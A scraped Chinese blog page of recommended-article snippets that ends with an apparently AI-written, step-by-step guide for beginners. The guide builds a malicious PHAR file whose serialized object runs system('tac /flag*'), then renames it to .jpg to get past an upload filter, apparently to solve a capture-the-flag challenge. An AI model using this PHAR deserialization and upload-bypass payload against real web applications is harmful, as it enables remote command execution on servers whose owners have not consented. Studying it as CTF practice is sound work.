我是新手!

最新推荐文章于 2025-03-14 06:04:48 发布
原创 最新推荐文章于 2025-03-14 06:04:48 发布 · 382 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

 我是新手!
sunjingjun
关注
GitHub 标星 2.9w+,我发现了一个宝藏项目,作为编程新手有福了!
Rocky0429
11-27 20万+
大家好,我是 Rocky0429,一个最近老在 GitHub 上闲逛的蒟蒻… 特别惭愧的是,虽然我很早就知道 GitHub,但是学会逛 GitHub 的时间特别晚。当时一方面是因为菜,看着这种全是英文的东西难受,不知道该怎么去玩,另一方面是一直在搞 ACM,没有做一些工程类的项目,所以想当然的以为和 GitHub 也没什么关系(当然这种想法是错误的)。 后来自己花了一个星期看完了 Pyt...
阿里云服务器搭建lnmp 新手!!!!!
01-03
今年,因为疫情原因,作为一名大学生的小遍也不得不宅在家里,玩着电脑,无意间发现阿里云有免费送6个月的服务器,我也是赶忙去白嫖了下,不得不说真香!!!嫖完服务器,我也是着手就尝试了搭建lnmp。。。 安装...
模糊PID基本原理及matlab仿真实现(新手新手新手!)
Ekko的博客
08-24 18万+
有关模糊pid的相关知识就把自己从刚接触到仿真出结果看到的大部分资料总结一下,以及一些自己的ps   以下未说明的都为转载内容   1.转自  https://blog.youkuaiyun.com/weixin_36340979/article/details/79168052 在讲解模糊PID前,我们先要了解PID控制器的原理(本文主要介绍模糊PID的运用,对PID控制器的原理不做详细介绍)。P...
GitHub新手用法详解【适合新手入门-建议收藏!!!】
m0_57787115的博客
04-22 10万+
GitHub新手用法详解【适合新手入门-建议收藏!!!】
github新手用法详解(建议收藏!!!)
怪咖@的博客
01-11 23万+
如果你是一枚Coder,但是你不知道Github,那么我觉的你就不是一个菜鸟级别的Coder,因为你压根不是真正Coder,你只是一个Code搬运工。说明你根本不善于突破自己!为什么这么说原因很简单,很多优秀的代码以及各种框架源码都存放于github当中! 目录github登录与注册git安装步骤详解 首先,我先对GitHub来一个简单介绍,GitHub他就是一个远程仓库,远程仓库通俗的理解就是一个可以保存自己代码的地方,在实际开发当中一个项目往往是有多个人来共同协作开发完成的,那么就需要一个统一代码保存的
我的世界修改服务器新手礼包,我的世界手机版礼包
weixin_42316272的博客
08-12 1211
我的世界是一款放松的建造类游戏,正如游戏名字一样,我的世界我做主没有压力,没有工作,完全放松的一个游戏。下面呢小编为大家带来了我的世界手机版礼包,希望对大家有帮助。教你用命令方块做新手大礼包腐竹必看下面小编为大家解析一下怎样使用命令方块给新手工具包,想知道的玩家一定不要错过下面的内容!希望此篇文章能帮到大家!来到一个服务器领取一下新手礼包~我的世界新手礼包我的世界礼包领取大全121快游网独家为...
刷题新手必看!如何简单快速地入坑leetcode!
weixin_71529728的博客
03-14 5600
那么我们在这里会分为三个阶段:新手——入门——老手。
Python安装教程(新手
热门推荐
Itmei的博客
11-06 85万+
       第一次接触Python,可能是爬虫或者是信息AI开发的小朋友,都说Python 语言简单,那么多学一些总是有好处的,下面从一个完全不懂的Python 的小白来安装Python 等一系列工作的记录,并且遇到的问题也会写出,让完全不懂的小白也可上手安装,并且完成第一个Hello world代码。 [Python 安装] 进入Python的官方下载页面 http://www.python.org/download/ 出现很
关于Typora显示不出图片问题,适用于新手!!!
Carolin_Carloin的博客
12-18 1万+
对于新手,我们有时会疑惑为什么Typora的md文件有时显示不出图片,出现如下问题,图片显示不出来 原因:不难发现以上路径是绝对路径,在别人的电脑上肯定是显示不出来的 解决: Typora —> 文件 —> 偏好设置 —> 图像 复制到相对路径,./images,这样之后的md文件都会自动创建一个images文件夹,这样以后可连同md文件打包,以便他人查看。 ...
MC新手指南
m0_51229861的博客
07-26 1287
我的世界》)是一款沙盒式建造游戏。玩家可以在游戏中的三维空间里创造和破坏游戏里的方块,打造精妙绝伦的建筑物,创造物和艺术品。是一个很好玩的游戏。那么,我的世界新手该怎么完全通关呢?快来看一看吧!
对单片机初学者一点建议!新手必看!
08-21
作为一名经验丰富的开发者,我将与新手分享一些宝贵的经验和建议,以帮助他们更好地学习和掌握单片机开发技术。 首先,选择合适的工具非常重要。作为初学者,不要认为自己可以没有工具就开始学习单片机开发。事实上...
mamba-ssm-2.2.2-cp310-cp310-win-amd64.whl+安装环境+测试脚本.7z
12-15
编译环境: vs2022 win10 x64 anaconda3+python3.10 torch==2.3.1+cu118 cuda11.8.0+cudnn8.9.7 triton==2.1.0 causal_conv1d==1.4.0 mamba==2.2.2 RTX2070显卡 注意编译的whl是不能用于RTX50显卡的,可以用于RTX20-RTX40系列显卡,安装时候尽量和模块一致
toplus1s_calculator_32040_1765656584703.zip
12-15
toplus1s_calculator_32040_1765656584703.zip
【创新无忧】基于多元宇宙优化算法MVO优化相关向量机RVM实现数据多输入单输出回归预测附matlab代码.zip
12-15
1.版本:matlab2014a/2019b/2024b 2.附赠案例数据可直接运行。 3.代码特点:参数化编程、参数可方便更改、代码编程思路清晰、注释明细。 4.适用对象:计算机,电子信息工程、数学等专业的大学生课程设计、期末大作业和毕业设计。
基于可靠性评估序贯蒙特卡洛模拟法的配电网可靠性评估研究(Matlab代码实现)
12-15
基于可靠性评估序贯蒙特卡洛模拟法的配电网可靠性评估研究(Matlab代码实现)内容概要:本文围绕“基于可靠性评估序贯蒙特卡洛模拟法的配电网可靠性评估研究”,介绍了利用Matlab代码实现配电网可靠性的仿真分析方法。重点采用序贯蒙特卡洛模拟法对配电网进行长时间段的状态抽样与统计,通过模拟系统元件的故障与修复过程,评估配电网的关键可靠性指标,如系统停电频率、停电持续时间、负荷点可靠性等。该方法能够有效处理复杂网络结构与设备时序特性,提升评估精度,适用于含分布式电源、电动汽车等新型负荷接入的现代配电网。文中提供了完整的Matlab实现代码与案例分析,便于复现和扩展应用。; 适合人群:具备电力系统基础知识和Matlab编程能力的高校研究生、科研人员及电力行业技术人员,尤其适合从事配电网规划、运行与可靠性分析相关工作的人员; 使用场景及目标:①掌握序贯蒙特卡洛模拟法在电力系统可靠性评估中的基本原理与实现流程;②学习如何通过Matlab构建配电网仿真模型并进行状态转移模拟;③应用于含新能源接入的复杂配电网可靠性定量评估与优化设计; 阅读建议:建议结合文中提供的Matlab代码逐段调试运行,理解状态抽样、故障判断、修复逻辑及指标统计的具体实现方式,同时可扩展至不同网络结构或加入更多不确定性因素进行深化研究。
基于控制李雅普诺夫-屏障函数(CLBF)与分布式模型预测控制(DMPC)研究(Matlab代码实现)
12-15
基于控制李雅普诺夫-屏障函数(CLBF)与分布式模型预测控制(DMPC)研究(Matlab代码实现)内容概要:本文介绍了基于控制李雅普诺夫-屏障函数(CLBF)与分布式模型预测控制(DMPC)的电力系统优化控制研究,并提供了相应的Matlab代码实现。该研究聚焦于提升含光热电站电力系统的安全性与稳定性,特别计及N-k安全约束,通过结合CLBF的稳定性保证能力和DMPC的分布式协同优化优势,实现对复杂电力系统的高效、可靠控制。文中还展示了多个相关
基于Spring Boot的流浪宠物救助系统的设计与实现源码.zip
最新发布
12-15
基于Spring Boot的流浪宠物救助系统的设计与实现源码.zip
平抑风电波动的电-氢混合储能容量优化配置(Matlab代码实现)
12-15
平抑风电波动的电-氢混合储能容量优化配置(Matlab代码实现)
步骤一详细一点,我不会使用这个程序,必须记住我是新手! 现在开始叙述步骤一
10-05
<think>我们重新详细解释步骤一,确保新手能完全理解。步骤一的目标是创建一个恶意的PHAR文件,然后重命名它以便上传。 ### 详细步骤一:创建恶意PHAR文件 #### 1. 确认XAMPP环境 - 确保你已经下载并安装了XAMPP。如果还没有,请到 [XAMPP官网](https://www.apachefriends.org/) 下载并安装。 - 安装后,启动XAMPP控制面板,并启动Apache服务(点击Apache模块右侧的“Start”按钮)。 #### 2. 创建项目文件夹 - 打开XAMPP的安装目录(默认在`C:\xampp`)。 - 进入`htdocs`文件夹(路径:`C:\xampp\htdocs`)。 - 在`htdocs`文件夹内,新建一个文件夹,命名为`exp`(你可以用其他名字,但这里我们用`exp`)。 #### 3. 编写生成PHAR的PHP脚本 - 在`exp`文件夹内,新建一个文本文件,命名为`generate_phar.php`(注意:确保文件扩展名是`.php`,而不是`.txt`)。 - 右键点击该文件,选择“编辑”或使用记事本打开,然后复制粘贴以下代码: ```php <?php class hacker { public $cmd = "?><?=system('tac /flag*');exit;;"; // 这是我们要执行的命令 public $a; // 这个属性可以不用管 } // 删除之前可能存在的exp.phar文件,避免生成失败 @unlink("exp.phar"); // 创建一个新的PHAR文件,文件名为exp.phar $phar = new Phar("exp.phar"); // 开始缓冲写入 $phar->startBuffering(); // 设置存根(stub),这是PHAR文件的标识 $phar->setStub("<?php __HALT_COMPILER(); ?>"); // 创建hacker对象 $object = new hacker(); // 将对象作为元数据存入PHAR文件 $phar->setMetadata($object); // 添加一个虚拟文件(PHAR要求至少有一个文件) $phar->addFromString("test.txt", "This is a test file."); // 结束缓冲并写入磁盘 $phar->stopBuffering(); echo "PHAR文件已生成!保存在当前目录下的exp.phar"; ?> ``` #### 4. 生成PHAR文件 - 打开浏览器(比如Edge),访问:`http://localhost/exp/generate_phar.php` - 如果一切正常,你会看到页面显示“PHAR文件已生成!保存在当前目录下的exp.phar”。 - 此时,在`C:\xampp\htdocs\exp`文件夹中,你会看到新生成的`exp.phar`文件。 #### 5. 重命名PHAR文件 - 由于题目可能只允许上传图片等文件,我们需要将`exp.phar`重命名为`exp.jpg`(假装是图片)。 - 在文件夹中,右键点击`exp.phar`文件,选择“重命名”,然后将文件名改为`exp.jpg`(注意:文件扩展名从`.phar`改为`.jpg`)。 #### 6. 注意事项 - 如果运行`generate_phar.php`时出现错误,可能是因为你的PHP环境没有启用`phar`扩展。默认情况下,XAMPP是启用的。如果未启用,你需要编辑`php.ini`文件(在`C:\xampp\php\php.ini`),确保有以下行: ``` extension=phar ``` 然后重启Apache。 ### 接下来 - 现在你已经有了一个名为`exp.jpg`的恶意文件,下一步就是上传这个文件到目标网站(步骤二)。 §§相关问题§§ 1. 如果生成PHAR文件时出现“Class 'Phar' not found”错误,应如何解决? 2. 为什么需要将PHAR文件重命名为图片格式(如.jpg)? 3. 在生成PHAR文件的PHP脚本中,为什么要在`$cmd`中包含`?><?= ...`? 4. 如何确认服务器上的上传目录路径? 5. 如果目标服务器禁用了`phar`扩展,应该采用什么替代方法? </think>### 详细步骤一:创建恶意PHAR文件(新手友好版) #### 1. 启动XAMPP服务 1. 双击桌面"XAMPP Control Panel"图标 2. 找到"Apache"模块 → 点击左侧"Start"按钮 3. 等待状态变为绿色"Running"(约10秒) #### 2. 创建项目文件夹 1. 打开文件资源管理器 2. 进入XAMPP安装目录(默认路径:`C:\xampp`) 3. 双击打开`htdocs`文件夹 4. 右键空白处 → 新建 → 文件夹 → 命名为`exp` #### 3. 创建PHP脚本文件 1. 在`htdocs/exp`文件夹中右键 → 新建 → 文本文档 2. 重命名文件为`generate_phar.php`(⚠️注意:必须删除.txt后缀) - 如果看不到文件扩展名: - 打开文件资源管理器 → 查看 → 勾选"文件扩展名" 3. 右键`generate_phar.php` → 用记事本打开 #### 4. 编写脚本内容 在记事本中**完整复制粘贴**以下代码(不要修改任何字符): ```php <?php class hacker { public $cmd = "?><?=system('tac /flag*');exit;;"; public $a; } @unlink("exp.phar"); $phar = new Phar("exp.phar"); $phar->startBuffering(); $phar->setStub("<?php __HALT_COMPILER(); ?>"); $obj = new hacker(); $phar->setMetadata($obj); $phar->addFromString("test.txt", "test"); $phar->stopBuffering(); echo "PHAR文件生成成功!请检查当前文件夹"; ?> ``` 4. 按`Ctrl+S`保存 → 关闭记事本 #### 5. 生成PHAR文件 1. 打开Edge浏览器 2. 地址栏输入:`http://localhost/exp/generate_phar.php` 3. 按回车执行 → 页面显示"PHAR文件生成成功!" 4. 返回`C:\xampp\htdocs\exp`文件夹 5. 确认存在`exp.phar`文件(创建时间应为当前时间) #### 6. 重命名文件 1. 右键`exp.phar` → 重命名 2. 修改为`exp.jpg`(欺骗上传过滤) 3. 弹出警告时点击"是" #### 文件验证 最终你的`exp`文件夹应包含: - `generate_phar.php` (脚本文件) - `exp.jpg` (恶意PHAR文件,原exp.phar) --- ### 关键解释(新手必读) 1. **为什么用`?><?= ...`结构?** - `?>` 关闭PHP标签 → `<?=` 开启短标签输出 - `system('tac /flag*')` 执行系统命令找flag - `exit` 阻止后续代码报错 - `;;` 确保过滤后只剩分号(满足正则检测) 2. **PHAR文件原理** - 伪装成图片的"特洛伊木马" - 上传后通过特殊协议触发其中代码 ---
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值